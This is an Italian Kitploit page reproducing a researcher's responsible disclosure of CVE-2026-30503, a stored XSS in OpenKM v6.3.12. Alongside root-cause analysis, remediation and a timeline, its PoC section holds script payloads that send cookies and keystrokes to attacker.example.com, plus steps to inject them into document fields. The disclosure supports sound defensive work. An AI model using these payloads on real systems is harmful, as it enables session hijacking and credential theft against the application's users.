Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-30503-OpenKM-6.3.12-Stored-XSS — Divulgazione dettagliata di CVE-2026-30503, una vulnerabilità XSS memorizzata in OpenKM v6.3.12. Include analisi delle cause profonde, payload PoC, valutazione dell'impatto e raccomandazioni di remediation per ricercatori di sicurezza e penetration tester. | Kitploit
Strumenti/GitHubGitHub/dharmstm/cve-2026-30503-openkm-6.3.12-stored-xss
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingPaper e RicercaApprendimento e Formazione
GitHubdharmstm/cve-2026-30503-openkm-6.3.12-stored-xss

CVE-2026-30503-OpenKM-6.3.12-Stored-XSS

Divulgazione dettagliata di CVE-2026-30503, una vulnerabilità XSS memorizzata in OpenKM v6.3.12. Include analisi delle cause profonde, payload PoC, valutazione dell'impatto e raccomandazioni di remediation per ricercatori di sicurezza e penetration tester.

Vedi Repository
13 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛡️ CVE-2026-30503 — XSS Memorizzata in OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Scoperto e segnalato da Dharmendra Kumar — Ricercatore di Sicurezza

Cybersicurezza | Penetration Testing | Ricerca di Vulnerabilità | Divulgazione Responsabile


📌 Indice

  • Panoramica
  • Dettagli CVE
  • Prodotto Affetto
  • Descrizione della Vulnerabilità
  • Analisi delle Cause Profonde
  • Impatto e Valutazione del Rischio
  • Proof of Concept (PoC)
  • Rimedi e Raccomandazioni
  • Cronologia della Divulgazione
  • Riferimenti
  • Informazioni sul Ricercatore

  • 🔍 Panoramica

    Questo repository documenta la divulgazione responsabile di CVE-2026-30503, una vulnerabilità di Cross-Site Scripting Memorizzata (Stored XSS) identificata in OpenKM v6.3.12 — un sistema di gestione documentale open-source ampiamente utilizzato in ambienti aziendali.

    La vulnerabilità consente a un attaccante autenticato di iniettare JavaScript malevolo persistente nell'applicazione, che viene eseguito nel contesto del browser di qualsiasi utente (inclusi gli amministratori) che successivamente visualizza il contenuto interessato.

    ⚠️ Gravità: Alta | Vettore d'Attacco: Rete | Privilegi Richiesti: Bassi | Interazione Utente: Necessaria


    📋 Dettagli CVE

    CampoDettagli
    ID CVECVE-2026-30503
    ProdottoOpenKM
    Versione Affettav6.3.12
    Classe di VulnerabilitàCross-Site Scripting Memorizzata (Stored XSS)
    CWECWE-79: Neutralizzazione Impropria dell'Input Durante la Generazione di Pagine Web
    Vettore CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
    RicercatoreDharmendra Kumar
    Tipo di DivulgazioneResponsabile / Coordinata

    📦 Prodotto Affetto

    OpenKM è un sistema di gestione documentale (DMS) gratuito e open-source che fornisce un'interfaccia web per la gestione, l'audit e la distribuzione di documenti aziendali. È utilizzato da aziende, enti governativi e istituzioni educative a livello globale.

    • Nome Prodotto: OpenKM Document Management System
    • Versione Affetta: v6.3.12
    • Sito Web del Venditore: https://www.openkm.com
    • Categoria: Sistema di Gestione Documentale (DMS)
    • Linguaggio/Stack: Java (JSP/Spring)

    🧨 Descrizione della Vulnerabilità

    Sono state scoperte multiple vulnerabilità di Cross-Site Scripting Memorizzata (Stored XSS) in OpenKM v6.3.12. Un attaccante con accesso autenticato a bassi privilegi può iniettare payload JavaScript arbitrari in uno o più campi di input. Questi payload vengono memorizzati permanentemente nel backend dell'applicazione e eseguiti automaticamente ogni volta che un utente — inclusi gli amministratori — accede alla pagina o al componente interessato.

    A differenza dell'XSS Riflesso, che richiede che la vittima clicchi su un link costruito ad hoc, i payload di Stored XSS sono incorporati nell'applicazione stessa, rendendoli significativamente più pericolosi e persistenti.

    Endpoint Vulnerabili

    • Campi di input controllati dall'utente nei metadati dei documenti, note o campi di denominazione
    • L'applicazione non riesce a sanificare o codificare l'input utente prima di visualizzarlo nel browser

    🔬 Analisi delle Cause Profonde

    La vulnerabilità deriva da tre debolezze combinate nella pipeline di gestione dell'input dell'applicazione:

    root@kitploit:~
    Input Utente ──► [NESSUNA Validazione] ──► Memorizzato nel DB ──► [NESSUN Codifica di Output] ──► Visualizzato nel Browser ──► XSS Eseguito
    
    DebolezzaDescrizione
    ❌ Validazione Input MancanteL'applicazione non limita né sanifica i caratteri speciali (<, >, ", ', ;) nei campi forniti dall'utente
    ❌ Codifica Output MancanteI valori memorizzati vengono visualizzati direttamente nell'HTML senza codifica in entità HTML
    ❌ Rendering DOM Non SicuroI dati forniti dall'utente vengono incorporati nel contesto DOM senza CSP o controlli di sanificazione

    💥 Impatto e Valutazione del Rischio

    Uno sfruttamento riuscito di questa vulnerabilità può portare a:

    RischioDescrizione
    🍪 Hijacking della SessioneRubare token di sessione autenticati tramite esfiltrazione di document.cookie
    👤 Compromissione dell'AccountCompromettere account della vittima, inclusi account amministratore
    🔐 Raccolta di CredenzialiIniettare moduli di phishing per catturare credenziali di accesso
    📤 Esfiltrazione di DatiEstrarre silenziosamente documenti sensibili o metadati dal DMS
    ⚙️ Azioni Non AutorizzateEseguire operazioni privilegiate per conto della vittima (eliminare/modificare documenti)
    🎯 Targeting dell'AmministratoreIl payload viene eseguito nel pannello di amministrazione quando un amministratore esamina il contenuto
    🔄 Propagazione del WormUn payload XSS auto-replicante può diffondersi tra gli utenti

    🧪 Proof of Concept (PoC)

    ⚠️ Disclaimer: Questo PoC è condiviso strettamente per scopi educativi e di ricerca sulla sicurezza secondo i principi della divulgazione responsabile. Non utilizzarlo contro sistemi di cui non si possiede la proprietà o senza esplicito permesso scritto per testarli.

    Esempio di Payload (Generico)

    root@kitploit:~
    // PoC di base — dimostra l'esecuzione dello script
    <script>alert('CVE-2026-30503 - XSS di Dharmendra Kumar')</script>
    
    // Esfiltrazione del token di sessione
    <script>fetch('https://attacker.example.com/steal?c='+document.cookie)</script>
    
    // Iniezione keylogger
    <script>document.onkeypress=function(e){fetch('https://attacker.example.com/log?k='+e.key)}</script>
    

    Passaggi per Riprodurre

    1. Accedere a OpenKM v6.3.12 con un account autenticato a bassi privilegi
    2. Navigare al campo di input vulnerabile (es. metadati del documento / note / campo titolo)
    3. Iniettare un payload XSS come <script>alert(document.cookie)</script>
    4. Salvare / inviare la voce
    5. Accedere come un utente diverso (o amministratore) e navigare alla risorsa interessata
    6. Osservare il payload JavaScript eseguito nel contesto del browser della vittima

    🛠️ Rimedi e Raccomandazioni

    Per Sviluppatori / Venditori

    RaccomandazioneImplementazione
    ✅ Validazione InputWhitelist dei caratteri consentiti; rifiutare o rimuovere i caratteri speciali HTML su tutti gli input utente
    ✅ Codifica OutputUsare codifica HTML context-aware (es. OWASP Java Encoder) prima di visualizzare i dati in HTML
    ✅ Content Security Policy (CSP)Implementare un'intestazione CSP rigorosa: Content-Security-Policy: script-src 'self'
    ✅ Cookie HTTPOnly e SicuriImpostare i flag HttpOnly e Secure su tutti i cookie di sessione per impedire l'accesso JS
    ✅ Utilizzare Librerie di SicurezzaIntegrare OWASP AntiSamy o DOMPurify per la sanificazione HTML
    ✅ Revisione del Codice di SicurezzaControllare tutti i percorsi di rendering per dati non sanificati controllati dall'utente
    ✅ AggiornamentoApplicare l'ultima patch fornita dal venditore o aggiornare a una versione corretta

    Per Amministratori di Sistema

    • 🔒 Limitare l'accesso all'istanza OpenKM solo a reti fidate
    • 📊 Monitorare i log dell'applicazione per attività insolite o tag script inaspettati nei campi di input
    • 🔄 Mantenere l'applicazione aggiornata all'ultima release corretta
    • 🧩 Distribuire un Web Application Firewall (WAF) con regole di rilevamento XSS come controllo compensativo

    📅 Cronologia della Divulgazione

    DataEvento
    🔍 ScopertaVulnerabilità identificata durante la valutazione della sicurezza di OpenKM v6.3.12
    📧 Notifica al VenditoreReport iniziale di divulgazione inviato al team di sicurezza OpenKM
    🤝 Riconoscimento del VenditoreIl team OpenKM ha riconosciuto il report
    📝 Assegnazione CVECVE-2026-30503 assegnato dal Programma CVE
    🌐 Divulgazione PubblicaDivulgazione pubblica coordinata dopo il periodo di remediation

    Questa vulnerabilità è stata divulgata seguendo le migliori pratiche di divulgazione responsabile, coordinando con il venditore e il Programma CVE prima del rilascio pubblico.


    📚 Riferimenti

    • 🔗 [ Github] (https://github.com/dharmstm/OpenKM-6.3-Stored-XSS-Report/).
    • 🔗 Voce CVE MITRE — CVE-2026-30503
    • 🔗 NVD — National Vulnerability Database
    • 🔗 Sito Ufficiale OpenKM
    • 🔗 OWASP XSS Prevention Cheat Sheet
    • 🔗 CWE-79: Cross-site Scripting
    • 🔗 OWASP Top 10 — A03:2021 Injection

    👨‍💻 Informazioni sul Ricercatore

    Dharmendra Kumar

    Ricercatore di Sicurezza | Penetration Tester | Cacciatore di Bug

    Dharmendra Kumar è un ricercatore di sicurezza informatica indipendente specializzato in sicurezza delle applicazioni web, penetration testing e divulgazione responsabile delle vulnerabilità. Con un focus sull'identificazione di difetti di sicurezza reali in software ampiamente utilizzati, il suo lavoro contribuisce a migliorare la postura di sicurezza delle applicazioni utilizzate a livello globale.

    Aree di Competenza:

    • 🌐 Penetration Testing di Applicazioni Web
    • 🐛 Caccia ai Bug Bounty
    • 🔍 Ricerca di Vulnerabilità e Report CVE
    • 📋 Divulgazione Responsabile e Advisory di Sicurezza
    • 🛡️ Vulnerabilità OWASP Top 10

    Connettiti:

    LinkedIn GitHub Twitter


    ⚖️ Disclaimer Legale

    Questo repository è inteso esclusivamente per scopi educativi e informativi. I dettagli della vulnerabilità e i payload del proof-of-concept qui condivisi sono pubblicati in conformità con i principi della divulgazione responsabile. L'autore non approva, incoraggia né si assume la responsabilità per qualsiasi uso non autorizzato di queste informazioni. Ottenere sempre esplicito permesso scritto prima di condurre test di sicurezza su qualsiasi sistema.


    🙏 Riconoscimenti

    Un ringraziamento speciale a:

    • Il team di sviluppo di OpenKM per la loro cooperazione durante il processo di divulgazione responsabile
    • Il Programma CVE / MITRE Corporation per l'assegnazione e il coordinamento dell'identificatore CVE
    • La più ampia comunità di ricerca sulla sicurezza per i loro continui sforzi per rendere il software più sicuro per tutti

    ⭐ Se questa ricerca è stata utile, considera di mettere una stella a questo repository.

    © 2026 Dharmendra Kumar — Tutti i Diritti Riservati

    Visitors

    Scarica lo strumento